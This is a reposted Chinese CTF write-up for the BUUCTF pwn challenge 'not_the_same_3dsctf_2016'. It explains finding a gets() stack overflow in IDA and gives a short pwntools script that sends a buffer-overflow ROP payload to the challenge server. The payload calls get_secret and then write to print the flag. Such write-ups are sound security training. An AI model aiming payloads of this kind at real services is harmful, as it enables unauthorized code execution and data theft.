[BUUCTF-pwn]——not_the_same_3dsctf_2016
生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn]——not_the_same_3dsctf_2016
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
not_the_same_3dsctf_2016
- 題目地址:https://buuoj.cn/challenges#not_the_same_3dsctf_2016
首先checksec一下,看看32位程序
在IDA中,發(fā)現(xiàn)棧溢出典型函數(shù)gets函數(shù),這里注意這個(gè)main函數(shù)沒有ebp
shift+F12看下,發(fā)現(xiàn)了flag.txt這種敏感 字符串
找到調(diào)用的函數(shù)get_secret函數(shù)
函數(shù)調(diào)用后,flag儲(chǔ)存在fl4g里面,我們找到fl4g的位置
找到可以輸出的write函數(shù)
下面我們就可以寫我們的exploit了
exploit
from pwn import * p = remote("node3.buuoj.cn",25722) write_addr = 0x0806E270 flag_addr = 0x080ECA2D get_secret = 0x080489A0 payload='a'* 0x2d + p32(get_secret) + p32(write_addr) + p32(0) + p32(1) + p32(flag_addr) + p32(45) p.sendline(payload) p.interactive()嘻嘻,如果有幫助的話,可以點(diǎn)個(gè)贊哦 😃
當(dāng)然,打賞就更加謝謝各位了,一分錢你買不了吃虧.嘿嘿🤭
總結(jié)
以上是生活随笔為你收集整理的[BUUCTF-pwn]——not_the_same_3dsctf_2016的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [BUUCTF-pwn]——jarvis
- 下一篇: [BUUCTF-pwn]——bjdctf